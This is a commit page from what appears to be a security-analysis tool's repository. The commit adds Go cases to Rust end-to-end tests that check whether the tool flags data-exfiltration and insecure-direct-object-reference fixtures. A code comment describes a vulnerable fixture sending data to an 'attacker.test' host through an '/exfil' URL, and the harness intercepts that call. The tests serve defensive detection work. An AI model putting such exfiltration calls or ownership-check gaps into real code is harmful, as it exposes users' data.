apunkt/nyx
1
0
Fork 0
mirror of https://github.com/elicpeter/nyx.git synced 2026-06-24 20:28:06 +02:00
Code Issues Projects Releases Packages Wiki Activity

[pitboss/grind] deferred session-0011 (20260522T163126Z-7d60)

Browse source
This commit is contained in:
pitboss 2026-05-22 16:11:50 -05:00
parent 089fe3556a
commit 6c4322832f
3 changed files with 606 additions and 6 deletions
Download patch file Download diff file Expand all files Collapse all files

50
tests/data_exfil_corpus.rs
View file

@ -134,8 +134,13 @@ mod e2e_data_exfil {
use tempfile::TempDir;
fn command_available(bin: &str) -> bool {
// Go's CLI uses `go version` (subcommand) instead of `go
// --version` and exits non-zero on `--version`. Every other
// toolchain here (python3, ruby, node, javac, php) accepts
// `--version`.
let arg = if bin == "go" { "version" } else { "--version" };
Command::new(bin)
.arg("--version")
.arg(arg)
.output()
.map(|o| o.status.success())
.unwrap_or(false)
@ -150,8 +155,9 @@ mod e2e_data_exfil {
Lang::JavaScript => "js",
Lang::Java => "java",
Lang::Php => "php",
Lang::Go => "go",
_ => unreachable!(
"DATA_EXFIL e2e currently covers Python + Ruby + JavaScript + Java + Php"
"DATA_EXFIL e2e currently covers Python + Ruby + JavaScript + Java + Php + Go"
),
})
.join(fixture);
@ -197,8 +203,9 @@ mod e2e_data_exfil {
Lang::JavaScript => "node",
Lang::Java => "javac",
Lang::Php => "php",
Lang::Go => "go",
_ => unreachable!(
"DATA_EXFIL e2e currently covers Python + Ruby + JavaScript + Java + Php"
"DATA_EXFIL e2e currently covers Python + Ruby + JavaScript + Java + Php + Go"
),
};
if !command_available(required) {
@ -404,4 +411,41 @@ mod e2e_data_exfil {
"PHP DATA_EXFIL benign control must not confirm via run_spec; got {outcome:?}",
);
}
/// Go pair, same shape as Python + Ruby + JavaScript + Java + Php.
/// The vuln fixture calls `http.Get("http://" + host + "/exfil?...")`;
/// the harness replaces `http.DefaultTransport` with a custom
/// `RoundTripper` that captures `req.URL.Hostname()` before any
/// wire I/O, emits a `ProbeKind::OutboundNetwork`, and returns a
/// benign empty 200 response. `OutboundHostNotIn` fires for the
/// `attacker.test` payload. The benign fixture's
/// `if _, ok := allowlist[host]; !ok { return }` guard short-
/// circuits before `http.Get` for non-loopback payloads so no
/// probe fires. Skips when `go` is not on PATH.
#[test]
fn go_vuln_confirms_via_run_spec() {
let Some(outcome) = run(Lang::Go, "vuln.go", "Run") else {
return;
};
assert!(
outcome.triggered_by.is_some(),
"Go DATA_EXFIL vuln must confirm via run_spec; got {outcome:?}",
);
let diff = outcome
.differential
.as_ref()
.expect("confirmed run must carry a DifferentialOutcome");
assert_eq!(diff.verdict, DifferentialVerdict::Confirmed);
}
#[test]
fn go_benign_does_not_confirm_via_run_spec() {
let Some(outcome) = run(Lang::Go, "benign.go", "Run") else {
return;
};
assert!(
outcome.triggered_by.is_none(),
"Go DATA_EXFIL benign control must not confirm via run_spec; got {outcome:?}",
);
}
}

49
tests/unauthorized_id_corpus.rs
View file

@ -125,8 +125,13 @@ mod e2e_unauthorized_id {
use tempfile::TempDir;
fn command_available(bin: &str) -> bool {
// Go's CLI uses `go version` (subcommand) instead of `go
// --version` and exits non-zero on `--version`. Every other
// toolchain here (python3, ruby, node, javac, php) accepts
// `--version`.
let arg = if bin == "go" { "version" } else { "--version" };
Command::new(bin)
.arg("--version")
.arg(arg)
.output()
.map(|o| o.status.success())
.unwrap_or(false)
@ -141,8 +146,9 @@ mod e2e_unauthorized_id {
Lang::JavaScript => "js",
Lang::Java => "java",
Lang::Php => "php",
Lang::Go => "go",
_ => unreachable!(
"UNAUTHORIZED_ID e2e currently covers Python + Ruby + JavaScript + Java + Php"
"UNAUTHORIZED_ID e2e currently covers Python + Ruby + JavaScript + Java + Php + Go"
),
})
.join(fixture);
@ -188,8 +194,9 @@ mod e2e_unauthorized_id {
Lang::JavaScript => "node",
Lang::Java => "javac",
Lang::Php => "php",
Lang::Go => "go",
_ => unreachable!(
"UNAUTHORIZED_ID e2e currently covers Python + Ruby + JavaScript + Java + Php"
"UNAUTHORIZED_ID e2e currently covers Python + Ruby + JavaScript + Java + Php + Go"
),
};
if !command_available(required) {
@ -387,4 +394,40 @@ mod e2e_unauthorized_id {
"PHP UNAUTHORIZED_ID benign control must not confirm via run_spec; got {outcome:?}",
);
}
/// Go pair, same shape as Python + Ruby + JavaScript + Java + Php.
/// The vuln fixture's `store[ownerID]` materialises `"bob@x"` for
/// the `bob` payload; the harness's `reflect`-driven presence check
/// fires the `IdorAccess(alice, bob)` probe and
/// `IdorBoundaryCrossed` confirms the differential. The benign
/// fixture's `if ownerID != callerID { return "" }` short-circuit
/// returns an empty string for the non-caller payload so the
/// presence check clears and no probe fires. Skips when `go` is
/// not on PATH.
#[test]
fn go_vuln_confirms_via_run_spec() {
let Some(outcome) = run(Lang::Go, "vuln.go", "Run") else {
return;
};
assert!(
outcome.triggered_by.is_some(),
"Go UNAUTHORIZED_ID vuln must confirm via run_spec; got {outcome:?}",
);
let diff = outcome
.differential
.as_ref()
.expect("confirmed run must carry a DifferentialOutcome");
assert_eq!(diff.verdict, DifferentialVerdict::Confirmed);
}
#[test]
fn go_benign_does_not_confirm_via_run_spec() {
let Some(outcome) = run(Lang::Go, "benign.go", "Run") else {
return;
};
assert!(
outcome.triggered_by.is_none(),
"Go UNAUTHORIZED_ID benign control must not confirm via run_spec; got {outcome:?}",
);
}
}